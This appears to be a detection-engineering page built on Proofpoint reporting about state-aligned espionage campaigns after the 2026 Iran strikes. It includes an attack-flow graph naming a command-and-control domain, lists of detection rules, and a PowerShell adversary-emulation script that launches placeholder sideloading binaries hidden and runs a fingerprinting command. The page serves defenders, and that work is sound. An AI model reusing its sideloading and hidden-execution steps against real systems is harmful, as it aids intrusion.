Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Proofpoint reported a rise in espionage and phishing activity tied to Iranian, Chinese, Pakistani, Belarusian, and other state-aligned threat actors after the February 2026 strikes in Iran. Adversaries used conflict-themed lures to go after government ministries, diplomatic organizations, and think tanks across the Middle East and the United States. These operations relied on credential phishing, malicious LNK files, DLL sideloading, and Cobalt Strike payloads delivered through compromised email accounts and cloud-hosted infrastructure. Detection efforts should prioritize malicious Office shortcuts, fake OneDrive-style login pages, and suspicious use of known malware loaders.
Investigation
Proofpoint tracked six separate campaigns — UNK_InnerAmbush, TA402, UNK_RobotDreams, UNK_NightOwl, TA473, and TA453 — that used email compromise, weaponized archives, and malicious links to deliver loaders that eventually launched Cobalt Strike. The researchers catalogued indicators including email addresses, domains, URLs, filenames, and file hashes. Where possible, the report also mapped the observed infrastructure to previously documented public reporting.
Mitigation
Organizations should require MFA for email and cloud platforms, block known malicious domains and URLs, and monitor for LNK execution and unexpected DLL loading activity. Email security controls should inspect attachments for LNK and archive-based delivery, while threat hunting should emphasize Cobalt Strike beacon behavior and unusual PowerShell execution.
Response
If a suspicious LNK, malicious archive, or Cobalt Strike beacon is identified, isolate the host, collect volatile evidence, and begin incident response immediately. Block related command-and-control domains and IP addresses, reset compromised accounts, and perform a full forensic investigation to identify any persistence mechanisms.
graph TB %% Class Definitions Section classDef action fill:#99ccff classDef artifact fill:#ffcc99 classDef process fill:#ffeb99 classDef malware fill:#ff9999 classDef service fill:#ccffcc classDef credential fill:#dddddd %% Nodes – Actions (Techniques) action_phishing_spear[“<b>Action</b> – <b>T1566.001 Phishing: Spearphishing Attachment</b><br/><b>Description</b>: Send emails with malicious ZIP or LNK attachments that execute code when opened.<br/><b>Confidence</b>: High”] class action_phishing_spear action action_execution_ps[“<b>Action</b> – <b>T1059.001 PowerShell</b><br/><b>Description</b>: Use PowerShell to download and execute additional payloads.<br/><b>Confidence</b>: High”] class action_execution_ps action action_defense_proxy[“<b>Action</b> – <b>T1218 System Binary Proxy Execution</b><br/><b>Description</b>: Load malicious DLL via signed binary (nvdaHelperRemoteLoader.exe).<br/><b>Confidence</b>: High”] class action_defense_proxy action action_c2_web[“<b>Action</b> – <b>T1102.002 Web Service: Bidirectional Communication</b><br/><b>Description</b>: Communicate with C2 hosts using web services such as Azure Front Door and OneDrive.<br/><b>Confidence</b>: High”] class action_c2_web action action_persistence_account[“<b>Action</b> – <b>T1098 Account Manipulation</b> & <b>T1078 Valid Accounts</b><br/><b>Description</b>: Use compromised email accounts to maintain foothold and send further phishing.<br/><b>Confidence</b>: High”] class action_persistence_account action action_phishing_additional[“<b>Action</b> – <b>T1566 Phishing (Additional)</b><br/><b>Description</b>: Host fake OWA/OneDrive credential pages to harvest credentials.<br/><b>Confidence</b>: High”] class action_phishing_additional action %% Nodes – Artifacts artifact_zip[“<b>Artifact</b> – Malicious ZIP attachment<br/><b>Content</b>: LNK and PDF files with embedded payloads”] class artifact_zip artifact artifact_lnk[“<b>Artifact</b> – LNK file (nvdaHelperRemoteLoader.exe)”] class artifact_lnk artifact artifact_ps_script[“<b>Artifact</b> – PowerShell script used for download”] class artifact_ps_script artifact artifact_dll[“<b>Artifact</b> – Malicious DLL (nvdaHelperRemote.dll)”] class artifact_dll malware %% Nodes – Processes / Tools process_loader[“<b>Process</b> – nvdaHelperRemoteLoader.exe (signed binary)”] class process_loader process process_powershell[“<b>Process</b> – PowerShell.exe executing download script”] class process_powershell process %% Nodes – Command & Control Services service_c2_almer[“<b>Service</b> – support.almersalstore.com (C2 domain)”] class service_c2_almer service service_c2_azure[“<b>Service</b> – Azure Front Door host”] class service_c2_azure service service_c2_onedrive[“<b>Service</b> – OneDrive file link (C2)”] class service_c2_onedrive service %% Nodes – Credentials / Accounts credential_email[“<b>Credential</b> – Compromised government email account”] class credential_email credential %% Connections – Attack Flow action_phishing_spear –>|delivers| artifact_zip artifact_zip –>|contains| artifact_lnk artifact_lnk –>|executes| process_loader process_loader –>|uses| action_defense_proxy action_defense_proxy –>|loads| artifact_dll artifact_dll –>|enables| action_execution_ps action_execution_ps –>|runs| process_powershell process_powershell –>|downloads payload via| artifact_ps_script process_powershell –>|communicates with| service_c2_almer process_powershell –>|communicates with| service_c2_azure process_powershell –>|communicates with| service_c2_onedrive service_c2_almer –>|supports| action_persistence_account service_c2_azure –>|supports| action_persistence_account service_c2_onedrive –>|supports| action_persistence_account action_persistence_account –>|uses| credential_email credential_email –>|sends| action_phishing_additional action_phishing_additional –>|hosts| artifact_zip
Attack Flow
Detections
Suspicious Binary / Scripts in Autostart Location (via file_event)
View
Suspicious Files in Public User Profile (via file_event)
View
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)
View
Suspicious Extracted Files from an Archive (via file_event)
View
Possible NvdaHelperRemote DLL Side-Loading Attempt (via image_load)
View
Suspicious CURL Usage (via cmdline)
View
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)
View
Possible Google Docs Domain Being Resolved By Uncommon Process (via dns_query)
View
Virtual Hard Disk File was Created (via file_event)
View
IOCs (HashSha256) to detect: Iran conflict drives heightened espionage activity against Middle East targets
View
IOCs (SourceIP) to detect: Iran conflict drives heightened espionage activity against Middle East targets
View
IOCs (DestinationIP) to detect: Iran conflict drives heightened espionage activity against Middle East targets
View
Detection of Suspicious Execution of nvdaHelperRemoteLoader.exe and VLCMediaPlayer.exe [Windows Process Creation]
View
Detection of C&C Domains Associated with UNK_InnerAmbush and UNK_RobotDreams Campaigns [Windows Network Connection]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An adversary has obtained a compromised copy ofnvdaHelperRemoteLoader.exeembedded with a malicious DLL (evil.dll). They place the binary inC:Tempand create a shortcut that points to it, triggering execution via a scheduled task (T1546.009). Simultaneously, they abuse the signed binaryVLCMediaPlayer.exe(T1218) to launch a PowerShell payload that performs host fingerprinting. Both binaries are launched directly to ensure the process‑creation event contains the exact executable name required by the rule. -
Regression Test Script:
# ------------------------------------------------- # Simulation script – triggers both detections # ------------------------------------------------- # Set execution folder $binPath = "C:Temp" # 1. Deploy malicious nvdaHelperRemoteLoader.exe (placeholder copy) $nvdaSrc = "C:ToolsMocksnvdaHelperRemoteLoader.exe" # <-- replace with real sample Copy-Item -Path $nvdaSrc -Destination "$binPathnvdaHelperRemoteLoader.exe" -Force # 2. Deploy malicious VLCMediaPlayer.exe (placeholder copy) $vlcSrc = "C:ToolsMocksVLCMediaPlayer.exe" # <-- replace with real sample Copy-Item -Path $vlcSrc -Destination "$binPathVLCMediaPlayer.exe" -Force # 3. Execute nvdaHelperRemoteLoader.exe (simulating DLL sideloading) Write-Host "Launching nvdaHelperRemoteLoader.exe ..." Start-Process -FilePath "$binPathnvdaHelperRemoteLoader.exe" -WindowStyle Hidden # 4. Execute VLCMediaPlayer.exe to run a fingerprinting PowerShell one‑liner $psCmd = "Get-WmiObject Win32_OperatingSystem | Select-Object Caption,Version" Write-Host "Launching VLCMediaPlayer.exe with PowerShell payload ..." Start-Process -FilePath "$binPathVLCMediaPlayer.exe" ` -ArgumentList "-I dummy --dummy-arg `"powershell -Command `$psCmd`" `" ` -WindowStyle Hidden Write-Host "Simulation complete. Verify alerts in your SIEM." -
Cleanup Commands:
# Stop any lingering test processes Get-Process -Name "nvdaHelperRemoteLoader","VLCMediaPlayer" -ErrorAction SilentlyContinue | Stop-Process -Force # Remove the test binaries Remove-Item -Path "C:TempnvdaHelperRemoteLoader.exe","C:TempVLCMediaPlayer.exe" -Force -ErrorAction SilentlyContinue Write-Host "Cleanup finished."